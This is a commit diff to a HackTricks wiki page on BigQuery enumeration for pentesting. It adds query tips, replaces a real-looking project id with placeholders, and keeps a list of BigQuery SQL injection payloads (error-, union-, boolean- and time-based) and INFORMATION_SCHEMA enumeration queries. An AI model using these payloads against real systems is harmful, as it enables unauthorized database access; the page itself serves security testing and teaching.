GITBOOK-620: No subject

HackTricks-wiki · Jun 2, 2024 · eaba868 · eaba868
1 parent 570463b
commit eaba868
Showing 1 changed file with 8 additions and 4 deletions.
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md
@@ -187,6 +187,10 @@ Get **information** about the **environment** such as:
 * Current user: `select session_user()`
 * Project id: `select @@project_id`
 
+Concat rows:
+
+* All table names: `string_agg(table_name, ', ')`
+
 Get **datasets**, **tables** and **column** names:
 
 * **Project** and **dataset** name:
@@ -197,13 +201,13 @@ SELECT catalog_name, schema_name FROM INFORMATION_SCHEMA.SCHEMATA
 ```
 {% endcode %}
 
-* **Column** and **table** names:&#x20;
+* **Column** and **table** names of **all the tables** of the dataset: &#x20;
 
 {% code overflow="wrap" %}
 ```sql
 # SELECT table_name, column_name FROM <proj-name>.<dataset-name>.INFORMATION_SCHEMA.COLUMNS
 
-SELECT table_name, column_name FROM digital-bonfire-410512.importeddataset.INFORMATION_SCHEMA.COLUMNS
+SELECT table_name, column_name FROM <project-id>.<dataset-name>.INFORMATION_SCHEMA.COLUMNS
 ```
 {% endcode %}
 
@@ -213,15 +217,15 @@ SELECT table_name, column_name FROM digital-bonfire-410512.importeddataset.INFOR
 ```sql
 # SELECT catalog_name, schema_name, FROM <proj-name>.INFORMATION_SCHEMA.SCHEMATA
 
-SELECT catalog_name, schema_name, NULL FROM digital-bonfire-410512.INFORMATION_SCHEMA.SCHEMATA
+SELECT catalog_name, schema_name, NULL FROM <project-id>.INFORMATION_SCHEMA.SCHEMATA
 ```
 {% endcode %}
 
 **SQL Injection types:**
 
 * Error based - casting: `select CAST(@@project_id AS INT64)`
 * Error based - division by zero: `' OR if(1/(length((select('a')))-1)=1,true,false) OR '`
-* Union based: `UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#`
+* Union based (you need to use ALL in bigquery): `UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#`
 * Boolean based: ``' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#``
 * Potential time based - Usage of public datasets example: ``SELECT * FROM `bigquery-public-data.covid19_open_data.covid19_open_data` LIMIT 1000``